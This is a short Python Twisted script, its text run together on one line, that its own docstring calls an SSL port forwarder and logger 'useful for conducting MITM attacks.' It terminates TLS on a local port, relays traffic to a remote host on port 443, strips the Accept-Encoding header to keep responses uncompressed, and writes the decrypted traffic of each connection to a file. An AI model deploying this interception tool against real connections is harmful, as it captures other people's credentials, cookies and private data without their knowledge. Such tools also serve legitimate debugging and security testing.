""" A trivial SSL port forwarder/logger. Useful for conducting MITM attacks. """ remote_host = XXXX # Twisted imports from twisted.internet import protocol from twisted.python import log import re counter = 0 munge = re.compile("Accept-Encoding: gzip, deflate\r\n") class Proxy(protocol.Protocol): noisy = True f=None peer = None def setPeer(self, peer): self.peer = peer def connectionLost(self, reason): print reason if self.peer is not None: self.peer.transport.loseConnection() self.peer = None elif self.noisy: log.msg("Unable to connect to peer: %s" % (reason,)) self.f=None def dataReceived(self, data): data = munge.sub('', data) if self.f: self.f.write(data) elif self.peer.f: self.peer.f.write(data) self.peer.transport.write(data) class ProxyClient(Proxy): def connectionMade(self): global counter self.peer.setPeer(self) peeraddr = self.transport.getHost() self.f = open("logs/%s.%s.%s" % (peeraddr.host, peeraddr.port, counter), 'w') counter=counter+1 # We're connected, everybody can read to their hearts content. self.peer.transport.resumeProducing() class ProxyClientFactory(protocol.ClientFactory): protocol = ProxyClient def setServer(self, server): self.server = server def buildProtocol(self, *args, **kw): prot = protocol.ClientFactory.buildProtocol(self, *args, **kw) prot.setPeer(self.server) return prot def clientConnectionFailed(self, connector, reason): self.server.transport.loseConnection() from twisted.internet import ssl ssl_context = ssl.ClientContextFactory() class ProxyServer(Proxy): clientProtocolFactory = ProxyClientFactory def connectionMade(self): # Don't read anything from the connecting client until we have # somewhere to send it to. self.transport.pauseProducing() client = self.clientProtocolFactory() client.setServer(self) from twisted.internet import reactor reactor.connectSSL(remote_host, 443, client, ssl_context) class ProxyFactory(protocol.Factory): """Factory for port forwarder.""" protocol = ProxyServer # Standard twisted application Boilerplate from twisted.application import service, strports application = service.Application("demoserver") s = strports.service('ssl:1200', ProxyFactory()) s.setServiceParent(application)